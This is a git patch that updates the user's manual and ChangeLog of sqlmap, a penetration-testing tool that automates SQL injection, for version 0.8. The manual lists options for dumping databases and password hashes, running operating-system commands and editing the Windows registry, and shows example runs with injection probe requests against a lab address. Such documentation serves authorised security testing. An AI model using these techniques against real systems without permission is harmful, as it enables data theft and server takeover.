From 054a4aaee7122daf38f2f5cf001c448787dac60a Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Fri, 12 Mar 2010 17:43:38 +0000 Subject: [PATCH] Updated documentation, almost ready for 0.8 release! --- doc/ChangeLog | 6 +- doc/README.html | 3105 +++++++++++++++++++++++++++-------------------- doc/README.pdf | Bin 387957 -> 422364 bytes doc/README.sgml | 814 +++++++------ 4 files changed, 2263 insertions(+), 1662 deletions(-) diff --git a/doc/ChangeLog b/doc/ChangeLog index 686eda39e..248aa533e 100644 --- a/doc/ChangeLog +++ b/doc/ChangeLog @@ -40,6 +40,8 @@ sqlmap (0.8-1) stable; urgency=low --drop-set-cookie (Miroslav). * Added support to specify which Google dork result page to parse, --gpage to be used together with -g (Miroslav). + * Major bug fix and enhancements to the multi-threading (--threads) + functionality (Miroslav). * Fixed URL encoding/decoding of GET/POST parameters and Cookie header (Miroslav). * Refactored --update to use python-svn third party library if available @@ -55,7 +57,9 @@ sqlmap (0.8-1) stable; urgency=low shells consequently reducing drastically the number of anti-virus softwares that mistakenly mark sqlmap as a malware (Miroslav). * Updated user's manual (Bernardo and Miroslav). - * Created several demo videos, http://sqlmap.sf.net/demo.html (Bernardo). + * Created several demo videos, hosted on YouTube + (http://www.youtube.com/user/inquisb) and linked from + http://sqlmap.sourceforge.net/demo.html (Bernardo). -- Bernardo Damele A. G. Sun, 14 Mar 2010 10:00:00 +0000 diff --git a/doc/README.html b/doc/README.html index 53f78e9a2..2a0b33521 100644 --- a/doc/README.html +++ b/doc/README.html @@ -1,14 +1,15 @@ - + sqlmap user's manual

sqlmap user's manual

by -Bernardo Damele A. G.

version 0.7, July 25, 2009 +Bernardo Damele A. G., +Miroslav Stamparversion 0.8, March 14, 2010
This document is the user's manual to use sqlmap. @@ -23,13 +24,14 @@ for the latest version.
  • 1.1 Requirements
  • 1.2 Scenario
  • 1.3 Techniques +
  • 1.4 Demo

    2. Features

    @@ -49,34 +51,29 @@ for the latest version.

  • 5.5 Techniques
  • 5.6 Fingerprint
  • 5.7 Enumeration -
  • 5.8 File system access -
  • 5.9 Operating system access -
  • 5.10 Miscellaneous +
  • 5.8 User-defined function injection +
  • 5.9 File system access +
  • 5.10 Operating system access +
  • 5.11 Windows registry access +
  • 5.12 Miscellaneous

    6. Disclaimer

    -

    7. Author

    +

    7. Authors

    1. Introduction

    -

    sqlmap is an open source command-line automatic -SQL injection -tool. -Its goal is to detect and take advantage of SQL injection vulnerabilities -in web applications. Once it detects one or more SQL injections on the -target host, the user can choose among a variety of options to perform an -extensive back-end database management system fingerprint, retrieve DBMS -session user and database, enumerate users, password hashes, privileges, -databases, dump entire or user's specified DBMS tables/columns, run his own -SQL statement, read or write either text or binary files on the file -system, execute arbitrary commands on the operating system, establish an -out-of-band stateful connection between the attacker box and the database -server via Metasploit payload stager, database stored procedure buffer -overflow exploitation or SMB relay attack and more.

    +

    sqlmap is an open source penetration testing tool that automates the +process of detecting and exploiting SQL injection flaws and taking over of +back-end database servers. +It comes with a broad range of features lasting from database +fingerprinting, over data fetching from the database, to accessing the +underlying file system and executing commands on the operating system via +out-of-band connections.

    1.1 Requirements @@ -85,30 +82,36 @@ overflow exploitation or SMB relay attack and more.

    sqlmap is developed in Python, a dynamic object-oriented interpreted programming language. -This makes the tool independent from the operating system since it only +This makes the tool independent from the operating system. It only requires the Python interpreter version equal or above to 2.5. The interpreter is freely downloadable from its official site. To make it even easier, many GNU/Linux distributions come out of the box -with Python interpreter package installed and other Unices and MacOS X -too provide it packaged in their formats and ready to be installed. +with Python interpreter installed and other Unices and Mac OSX too provide +it packaged in their formats and ready to be installed. Windows users can download and install the Python setup-ready installer for x86, AMD64 and Itanium too.

    sqlmap relies on the Metasploit Framework for some of its post-exploitation takeover -functionalities. You need to grab a copy of it from the +features. You need to grab a copy of it from the download -page. The required version is 3.3 or above.

    +page. The required version is 3.3.3 or above. However, it is +recommended to use the Metasploit latest development version from the +Subversion repository.

    +

    If you plan to attack a web application behind NTLM authentication or use +the sqlmap update functionality you need to install respectively +python-ntlm +and +python-svn libraries.

    Optionally, if you are running sqlmap on Windows, you may wish to install PyReadline library to be able to take advantage of the sqlmap TAB completion and history support functionalities in the SQL shell and OS shell. Note that these functionalities are available natively by Python standard readline -library on other operating systems. -You can also choose to install -Psyco -library to speed up the sqlmap algorithmic operations.

    +library on other operating systems.

    +

    You can also choose to install +Psyco library to speed up the sqlmap algorithmic operations.

    1.2 Scenario @@ -125,19 +128,19 @@ or even be able to access the underlying operating system.

    Consider that the target url is:

    -http://192.168.1.121/sqlmap/mysql/get_int.php?id=1 +http://172.16.213.131/sqlmap/mysql/get_int.php?id=1

    Assume that:

    -http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=1 +http://172.16.213.131/sqlmap/mysql/get_int.php?id=1+AND+1=1

    is the same page as the original one and:

    -http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=2 +http://172.16.213.131/sqlmap/mysql/get_int.php?id=1+AND+1=2

    differs from the original one, it means that you are in front of a SQL @@ -150,10 +153,10 @@ does not depend upon the back-end database management system nor on the web application programming language: it is a programmer code's security flaw. The Open Web Application Security Project -rated on 2007 in their -OWASP Top Ten survey this vulnerability as the -most common and important web application vulnerability, second only to -Cross-Site Scripting.

    +rated on 2010 in their +OWASP Top Ten survey this vulnerability as the +most common and important web application vulnerability along with other +injection flaws.

    Back to the scenario, probably the SQL SELECT statement into get_int.php has a syntax similar to the following SQL query, in pseudo PHP code:

    @@ -182,14 +185,13 @@ on the Net explaining in depth how to prevent, how to detect and how to exploit SQL injection vulnerabilities in web application and it is recommended to read them if you are not familiar with the issue before going ahead with sqlmap.

    -

    Passing the original address, http://192.168.1.121/sqlmap/mysql/get_int.php?id=1 +

    Passing the original address, http://172.16.213.131/sqlmap/mysql/get_int.php?id=1 to sqlmap, the tool will automatically:

    • Identify the vulnerable parameter(s) (id in this scenario);
      • -
    • Depending on the user's options, sqlmap uses the blind SQL -injection or the inband SQL injection technique as described -in the following section to go ahead with the exploiting.
      • +
    • Depending on the user's options, fingerprint, enumerate, takeover +the database server.

    @@ -241,10 +243,18 @@ and the session user privileges.

    • +

    1.4 Demo +

    + +

    You can watch several demo videos, they are hosted on +YouTube and linked +from +here.

    +

    2. Features

    -

    Major features implemented in sqlmap include:

    +

    Features implemented in sqlmap include:

    2.1 Generic features @@ -254,7 +264,7 @@ and the session user privileges.
    • Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server back-end database management systems. -Besides these four database management systems software. sqlmap can also +Besides these four database management systems software, sqlmap can also identify Microsoft Access, DB2, Informix, Sybase and Interbase.
    • Full support for three SQL injection techniques: inferential @@ -265,12 +275,14 @@ blind SQL injection.
    • It is possible to provide a single target URL, get the list of targets from Burp proxy -requests log file path or +requests log file or WebScarab proxy -conversations/ folder path or get the list of targets by providing -sqlmap with a Google dork which queries +conversations/ folder, get the whole HTTP request from a text +file or get the list of targets by providing sqlmap with a Google dork +which queries Google search engine and -parses its results page. +parses its results page. You can also define a regular-expression based +scope that is used to identify which of the parsed addresses to test.
    • Automatically tests all provided GET parameters, POST parameters, HTTP Cookie header values and HTTP @@ -279,29 +291,32 @@ those that vary the HTTP response page content. On the dynamic ones sqlmap automatically tests and detects the ones affected by SQL injection. Each dynamic parameter is tested for numeric, single quoted string, double quoted -string and all of these three datatypes with zero to two parenthesis +string and all of these three data-types with zero to two parenthesis to correctly detect which is the SELECT statement syntax to -perform further injections with. It is also possible to specify the +perform further injections with. It is also possible to specify the only parameter(s) that you want to perform tests and use for injection on.
    • Option to specify the maximum number of concurrent HTTP -requests to speed up the blind SQL injection algorithms -(multithreading). It is also possible to specify the number of seconds to +requests to speed up the inferential blind SQL injection algorithms +(multi-threading). It is also possible to specify the number of seconds to wait between each HTTP request.
    • HTTP Cookie header string support, useful when the web application requires authentication based upon cookies and you have such data or in case you just want to test for and exploit SQL injection -on such header. +on such header. You can also specify to always URL-encode the Cookie +header.
    • Automatically handle HTTP Set-Cookie header from -target url, re-establishing of the session if it expires. Test and exploit -on these values is supported too. +the application, re-establishing of the session if it expires. Test and +exploit on these values is supported too. You can also force to ignore any +Set-Cookie header.
      • -
    • HTTP Basic and Digest authentications support. +
    • HTTP Basic, Digest, NTLM and Certificate authentications +support.
    • Anonymous HTTP proxy support to pass by the requests to the -target URL that works also with HTTPS requests. +target application that works also with HTTPS requests.
    • Options to fake the HTTP Referer header value and the HTTP User-Agent header value specified by user or @@ -309,7 +324,7 @@ randomly selected from a text file.
    • Support to increase the verbosity level of output messages: there exist six levels. The default level is 1 in which -information, warnings, errors and tracebacks, if they occur, will be shown. +information, warnings, errors and tracebacks (if any occur) will be shown.
    • Granularity in the user's options.
      • @@ -317,90 +332,141 @@ information, warnings, errors and tracebacks, if they occur, will be shown. in real time while fetching the information to give to the user an overview on how long it will take to retrieve the output. -
    • Support to save the session (queries and their output, even if -partially retrieved) in real time while fetching the data on a text file -and resume the injection from this file in a second time. +
    • Automatic support to save the session (queries and their output, +even if partially retrieved) in real time while fetching the data on a +text file and resume the injection from this file in a second +time.
    • Support to read options from a configuration INI file rather than specify each time all of the options on the command line. Support also to save command line options on a configuration INI file.
      • -
    • Integration with other IT security related open source projects, -Metasploit and -w3af. +
    • Option to update sqlmap as a whole to the latest development version +from the Subversion repository.
      • -
    • PHP setting magic_quotes_gpc bypass by encoding -every query string, between single quotes, with CHAR, or similar, -database management system function.
      • +
    • Integration with other IT security open source projects, +Metasploit and +w3af.

    -

    2.2 Enumeration features +

    2.2 Fingerprint and enumeration features

    +

    2.3 Takeover features

    +

    Some of these techniques are detailed in the white paper +Advanced SQL injection to operating system full control and in the +slide deck +Expanding the control over the operating system from the database.

    +

    3. Download and update

    sqlmap can be downloaded from its @@ -409,31 +475,31 @@ It is available in various formats:

    -

    You can also checkout the source code from the sqlmap +

    You can also checkout the latest development version from the sqlmap Subversion -repository to give a try to the development release:

    +repository:

    @@ -442,16 +508,57 @@ $ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

    +

    If you download a source package (gzip, bzip2 or zip) or sqlmap from the +Subversion repository, you can update it to the latest development version +anytime by running:

    +

    +

    +
    +$ python sqlmap.py --update
+
    +
    +

    +

    Or:

    +

    +

    +
    +$ svn update
+
    +
    +

    + +

    Viceversa if you download a binary package (deb, rpm or exe), the +update feature is disabled.

    + +

    There are some differences between the packages:

    +

    +

      +
    • The source packages (gzip, bzip2 and zip) have all features. They +contains the working copy from the Subversion repository updated at the +time the sqlmap new version has been released.
      • +
    • The Debian and Red Hat installation packages (deb and rpm) are +compliant with the Linux distributions' packaging guidelines. This implies +that they do not support the update features and do not include +third-party softwares Churrasco (used to perform Windows token kidnapping, +see below) and UPX (used to pack the Metasploit payload stager in some +cases, see below).
      • +
    • The Windows binary package (exe) can't update itself and does not +support the takeover out-of-band features because they rely on +Metasploit's msfcli which is not available for Windows.
      • +
    +

    + +

    It is therefore recommended to download any of the source packages and run +it either from a shell like Bash on Unix and Mac OSX or from Cygwin on +Windows.

    +

    4. License and copyright

    sqlmap is released under the terms of the General Public License v2. sqlmap is copyrighted by -Bernardo Damele A. G. -(2007-2009) and -Daniele Bellucci -(2006).

    +Bernardo Damele A. G..

    5. Usage

    @@ -461,8 +568,8 @@ sqlmap is copyrighted by 
     $ python sqlmap.py -h
 
-    sqlmap/0.7
-    by Bernardo Damele A. G. <bernardo.damele@gmail.com>
+    sqlmap/0.8 - automatic SQL injection and database takeover tool
+    http://sqlmap.sourceforge.net
     
 Usage: sqlmap.py [options]
 
@@ -476,7 +583,8 @@ Options:
     get target urls from.
 
     -u URL, --url=URL   Target url
-    -l LIST             Parse targets from Burp or WebScarab logs
+    -l LIST             Parse targets from Burp or WebScarab proxy logs
+    -r REQUESTFILE      Load HTTP request from a file
     -g GOOGLEDORK       Process Google dork results as target urls
     -c CONFIGFILE       Load options from a configuration INI file
 
@@ -486,17 +594,22 @@ Options:
     --method=METHOD     HTTP method, GET or POST (default GET)
     --data=DATA         Data string to be sent through POST
     --cookie=COOKIE     HTTP Cookie header
-    --referer=REFERER   HTTP Referer header
+    --cookie-urlencode  URL Encode generated cookie injections
+    --drop-set-cookie   Ignore Set-Cookie header from response
     --user-agent=AGENT  HTTP User-Agent header
     -a USERAGENTSFILE   Load a random HTTP User-Agent header from file
+    --referer=REFERER   HTTP Referer header
     --headers=HEADERS   Extra HTTP headers newline separated
-    --auth-type=ATYPE   HTTP Authentication type (value Basic or Digest)
-    --auth-cred=ACRED   HTTP Authentication credentials (value name:password)
+    --auth-type=ATYPE   HTTP authentication type (Basic, Digest or NTLM)
+    --auth-cred=ACRED   HTTP authentication credentials (name:password)
+    --auth-cert=ACERT   HTTP authentication certificate (key_file,cert_file)
     --proxy=PROXY       Use a HTTP proxy to connect to the target url
+    --ignore-proxy      Ignore system default HTTP proxy
     --threads=THREADS   Maximum number of concurrent HTTP requests (default 1)
     --delay=DELAY       Delay in seconds between each HTTP request
     --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
     --retries=RETRIES   Retries when the connection timeouts (default 3)
+    --scope=SCOPE       Regexp to filter targets from provided proxy log
 
   Injection:
     These options can be used to specify which parameters to test for,
@@ -539,12 +652,12 @@ Options:
     --current-db        Retrieve DBMS current database
     --is-dba            Detect if the DBMS current user is DBA
     --users             Enumerate DBMS users
-    --passwords         Enumerate DBMS users password hashes (opt -U)
-    --privileges        Enumerate DBMS users privileges (opt -U)
+    --passwords         Enumerate DBMS users password hashes
+    --privileges        Enumerate DBMS users privileges
     --dbs               Enumerate DBMS databases
-    --tables            Enumerate DBMS database tables (opt -D)
-    --columns           Enumerate DBMS database table columns (req -T opt -D)
-    --dump              Dump DBMS database table entries (req -T, opt -D, -C)
+    --tables            Enumerate DBMS database tables
+    --columns           Enumerate DBMS database table columns
+    --dump              Dump DBMS database table entries
     --dump-all          Dump all DBMS databases tables entries
     -D DB               DBMS database to enumerate
     -T TBL              DBMS database table to enumerate
@@ -553,9 +666,17 @@ Options:
     --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
     --start=LIMITSTART  First query output entry to retrieve
     --stop=LIMITSTOP    Last query output entry to retrieve
+    --first=FIRSTCHAR   First query output word character to retrieve
+    --last=LASTCHAR     Last query output word character to retrieve
     --sql-query=QUERY   SQL statement to be executed
     --sql-shell         Prompt for an interactive SQL shell
 
+  User-defined function injection:
+    These options can be used to create custom user-defined functions.
+
+    --udf-inject        Inject custom user-defined functions
+    --shared-lib=SHLIB  Local path of the shared library
+
   File system access:
     These options can be used to access the back-end database management
     system underlying file system.
@@ -565,7 +686,7 @@ Options:
     --dest-file=DFILE   Back-end DBMS absolute filepath to write to
 
   Operating system access:
-    This option can be used to access the back-end database management
+    These options can be used to access the back-end database management
     system underlying operating system.
 
     --os-cmd=OSCMD      Execute an operating system command
@@ -577,10 +698,24 @@ Options:
     --msf-path=MSFPATH  Local path where Metasploit Framework 3 is installed
     --tmp-path=TMPPATH  Remote absolute path of temporary files directory
 
+  Windows registry access:
+    These options can be used to access the back-end database management
+    system Windows registry.
+
+    --reg-read          Read a Windows registry key value
+    --reg-add           Write a Windows registry key value data
+    --reg-del           Delete a Windows registry key value
+    --reg-key=REGKEY    Windows registry key
+    --reg-value=REGVAL  Windows registry key value
+    --reg-data=REGDATA  Windows registry key value data
+    --reg-type=REGTYPE  Windows registry key value type
+
   Miscellaneous:
-    --eta               Display for each output the estimated time of arrival
-    --update            Update sqlmap to the latest stable version
     -s SESSIONFILE      Save and resume all data retrieved on a session file
+    --flush-session     Flush session file for current target
+    --eta               Display for each output the estimated time of arrival
+    --gpage=GOOGLEPAGE  Use google dork results from specified page number
+    --update            Update sqlmap
     --save              Save options on a configuration INI file
     --batch             Never ask for user input, use the default behaviour
     --cleanup           Clean up the DBMS by sqlmap specific UDF and tables
@@ -596,45 +731,38 @@ Options:
 
 
    Verbose options can be used to set the verbosity level of output messages.
 There exist six levels.
-The default level is 1 in which information, warnings, errors and
-tracebacks, if they occur, will be shown.
+The default level is 1 in which
+information, warnings, errors and tracebacks (if any occur) will be shown.
 Level 2 shows also debug messages, level 3 shows also
-HTTP requests with all HTTP headers sent, level 4 shows also HTTP
-responses headers and level 5 shows also HTTP responses page
-content.
    
+full HTTP requests, level 4 shows also HTTP responses headers and
+level 5 shows also HTTP responses page content.
    
 
 
    Example on a MySQL 5.0.67 target (verbosity level 1):
    
 
    
 
    
 
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1
+
+[hh:mm:58] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
+[hh:mm:58] [INFO] testing connection to the target url
+[hh:mm:58] [INFO] testing if the url is stable, wait a few seconds
+[hh:mm:59] [INFO] url is stable
+[hh:mm:59] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
+[hh:mm:59] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
+[hh:mm:59] [INFO] testing if GET parameter 'id' is dynamic
+[hh:mm:59] [INFO] confirming that GET parameter 'id' is dynamic
+[hh:mm:59] [INFO] GET parameter 'id' is dynamic
+[hh:mm:59] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
+[hh:mm:59] [INFO] testing unescaped numeric injection on GET parameter 'id'
+[hh:mm:59] [INFO] confirming unescaped numeric injection on GET parameter 'id'
+[hh:mm:59] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
+[hh:mm:59] [INFO] testing for parenthesis on injectable parameter
+[hh:mm:59] [INFO] the injectable parameter requires 0 parenthesis
+[hh:mm:59] [INFO] testing MySQL
+[hh:mm:59] [INFO] confirming MySQL
+[hh:mm:59] [INFO] retrieved: 0
+[hh:mm:59] [INFO] the back-end DBMS is MySQL
 
-[hh:mm:12] [INFO] testing connection to the target url
-[hh:mm:12] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:14] [INFO] url is stable
-[hh:mm:14] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:14] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-[hh:mm:14] [INFO] testing if GET parameter 'id' is dynamic
-[hh:mm:14] [INFO] confirming that GET parameter 'id' is dynamic
-[hh:mm:14] [INFO] GET parameter 'id' is dynamic
-[hh:mm:14] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
-[hh:mm:14] [INFO] testing unescaped numeric injection on GET parameter 'id'
-[hh:mm:14] [INFO] confirming unescaped numeric injection on GET parameter 'id'
-[hh:mm:14] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
-[hh:mm:14] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:14] [INFO] the injectable parameter requires 0 parenthesis
-[hh:mm:14] [INFO] testing MySQL
-[hh:mm:14] [INFO] query: CONCAT(CHAR(53), CHAR(53))
-[hh:mm:14] [INFO] retrieved: 55
-[hh:mm:14] [INFO] performed 20 queries in 0 seconds
-[hh:mm:14] [INFO] confirming MySQL
-[hh:mm:14] [INFO] query: LENGTH(CHAR(53))
-[hh:mm:14] [INFO] retrieved: 1
-[hh:mm:14] [INFO] performed 13 queries in 0 seconds
-[hh:mm:14] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
-[hh:mm:14] [INFO] retrieved: 5
-[hh:mm:14] [INFO] performed 13 queries in 0 seconds
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
 web application technology: PHP 5.2.6, Apache 2.2.9
 back-end DBMS: MySQL >= 5.0.0
 
    
@@ -645,27 +773,40 @@ back-end DBMS: MySQL >= 5.0.0
 
    
 
    
 
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 2
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 2
 
-[hh:mm:03] [DEBUG] initializing the configuration
-[hh:mm:03] [DEBUG] initializing the knowledge base
-[hh:mm:03] [DEBUG] cleaning up configuration parameters
-[hh:mm:03] [DEBUG] setting the HTTP method to GET
-[hh:mm:03] [DEBUG] creating HTTP requests opener object
-[hh:mm:03] [DEBUG] parsing XML queries file
-[hh:mm:03] [INFO] testing connection to the target url
-[hh:mm:03] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:04] [INFO] url is stable
-[hh:mm:04] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:04] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-[hh:mm:04] [INFO] testing if GET parameter 'id' is dynamic
-[hh:mm:04] [INFO] confirming that GET parameter 'id' is dynamic
-[hh:mm:04] [INFO] GET parameter 'id' is dynamic
-[hh:mm:04] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
-[hh:mm:04] [INFO] testing unescaped numeric injection on GET parameter 'id'
-[hh:mm:04] [INFO] confirming unescaped numeric injection on GET parameter 'id'
-[hh:mm:04] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
-[...]
+[hh:mm:22] [DEBUG] initializing the configuration
+[hh:mm:22] [DEBUG] initializing the knowledge base
+[hh:mm:22] [DEBUG] cleaning up configuration parameters
+[hh:mm:22] [DEBUG] setting the HTTP timeout
+[hh:mm:22] [DEBUG] setting the HTTP method to GET
+[hh:mm:22] [DEBUG] creating HTTP requests opener object
+[hh:mm:22] [DEBUG] parsing XML queries file
+[hh:mm:22] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
+[hh:mm:22] [INFO] testing connection to the target url
+[hh:mm:22] [INFO] testing if the url is stable, wait a few seconds
+[hh:mm:23] [INFO] url is stable
+[hh:mm:23] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
+[hh:mm:23] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
+[hh:mm:23] [INFO] testing if GET parameter 'id' is dynamic
+[hh:mm:23] [DEBUG] setting match ratio to 0.743
+[hh:mm:23] [INFO] confirming that GET parameter 'id' is dynamic
+[hh:mm:23] [INFO] GET parameter 'id' is dynamic
+[hh:mm:23] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
+[hh:mm:23] [INFO] testing unescaped numeric injection on GET parameter 'id'
+[hh:mm:23] [INFO] confirming unescaped numeric injection on GET parameter 'id'
+[hh:mm:23] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
+[hh:mm:23] [INFO] testing for parenthesis on injectable parameter
+[hh:mm:23] [INFO] the injectable parameter requires 0 parenthesis
+[hh:mm:23] [INFO] testing MySQL
+[hh:mm:23] [INFO] confirming MySQL
+[hh:mm:23] [DEBUG] query: SELECT 2 FROM information_schema.TABLES LIMIT 0, 1
+[hh:mm:23] [INFO] retrieved: 2
+[hh:mm:23] [DEBUG] performed 7 queries in 0 seconds
+[hh:mm:23] [INFO] the back-end DBMS is MySQL
+
+web application technology: PHP 5.2.6, Apache 2.2.9
+back-end DBMS: MySQL >= 5.0.0
 
    
 
    
 
    
@@ -674,31 +815,34 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 2
 
    
 
    
 
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 3
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 3
 
-[...]
-[hh:mm:54] [INFO] testing connection to the target url
-[hh:mm:54] [TRAFFIC OUT] HTTP request:
+[hh:mm:53] [DEBUG] initializing the configuration
+[hh:mm:53] [DEBUG] initializing the knowledge base
+[hh:mm:53] [DEBUG] cleaning up configuration parameters
+[hh:mm:53] [DEBUG] setting the HTTP timeout
+[hh:mm:53] [DEBUG] setting the HTTP method to GET
+[hh:mm:53] [DEBUG] creating HTTP requests opener object
+[hh:mm:53] [DEBUG] parsing XML queries file
+[hh:mm:53] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
+[hh:mm:53] [INFO] testing connection to the target url
+[hh:mm:53] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 192.168.1.121:80
+Host: 172.16.213.131
 Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
+Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+User-agent: sqlmap/0.8
 Connection: close
 [...]
-[hh:mm:55] [INFO] testing MySQL
-[hh:mm:55] [INFO] query: CONCAT(CHAR(54), CHAR(54))
-[hh:mm:55] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2854%29%2C%20CHAR
-%2854%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%201104=1104 HTTP/1.1
+[hh:mm:54] [INFO] testing MySQL
+[hh:mm:54] [TRAFFIC OUT] HTTP request:
+GET /sqlmap/mysql/get_int.php?id=1%20AND%20CONNECTION_ID%28%29=CONNECTION_ID%28%29%20AND%202385=2385 HTTP/1.1
 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 192.168.1.121:80
+Host: 172.16.213.131
 Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
+Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+User-agent: sqlmap/0.8
 Connection: close
 [...]
 
    
@@ -709,41 +853,36 @@ Connection: close
 
    
 
    
 
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 4
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 4
 
 [...]
-[hh:mm:44] [INFO] testing connection to the target url
-[hh:mm:44] [TRAFFIC OUT] HTTP request:
+[hh:mm:20] [DEBUG] initializing the configuration
+[hh:mm:20] [DEBUG] initializing the knowledge base
+[hh:mm:20] [DEBUG] cleaning up configuration parameters
+[hh:mm:20] [DEBUG] setting the HTTP timeout
+[hh:mm:20] [DEBUG] setting the HTTP method to GET
+[hh:mm:20] [DEBUG] creating HTTP requests opener object
+[hh:mm:20] [DEBUG] parsing XML queries file
+[hh:mm:20] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
+[hh:mm:20] [INFO] testing connection to the target url
+[hh:mm:20] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 192.168.1.121:80
+Host: 172.16.213.131
 Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
+Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+User-agent: sqlmap/0.8
 Connection: close
 
-[hh:mm:44] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Thu, 11 Dec 2008 hh:mm:44 GMT
-Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4 with Suhosin-Patch
-X-Powered-By: PHP/5.2.6-2ubuntu4
-Content-Length: 119
+[hh:mm:20] [TRAFFIC IN] HTTP response (OK - 200):
+Date: Sat, 20 Feb 2010 17:43:00 GMT
+Server: Apache/2.2.9
+X-Powered-By: PHP/5.2.6-1+lenny4
+Vary: Accept-Encoding
+Content-Length: 127
 Connection: close
 Content-Type: text/html
 [...]
-[hh:mm:45] [INFO] testing MySQL
-[hh:mm:46] [INFO] query: CONCAT(CHAR(52), CHAR(52))
-[hh:mm:46] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20CHAR
-%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%203030=3030 HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 192.168.1.121:80
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
-Connection: close
-[...]
 
    
 
    
 
    
@@ -752,26 +891,33 @@ Connection: close
 
    
 
    
 
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 5
 
-[...]
-[hh:mm:17] [INFO] testing connection to the target url
-[hh:mm:17] [TRAFFIC OUT] HTTP request:
+[hh:mm:47] [DEBUG] initializing the configuration
+[hh:mm:47] [DEBUG] initializing the knowledge base
+[hh:mm:47] [DEBUG] cleaning up configuration parameters
+[hh:mm:47] [DEBUG] setting the HTTP timeout
+[hh:mm:47] [DEBUG] setting the HTTP method to GET
+[hh:mm:47] [DEBUG] creating HTTP requests opener object
+[hh:mm:47] [DEBUG] parsing XML queries file
+[hh:mm:47] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
+[hh:mm:47] [INFO] testing connection to the target url
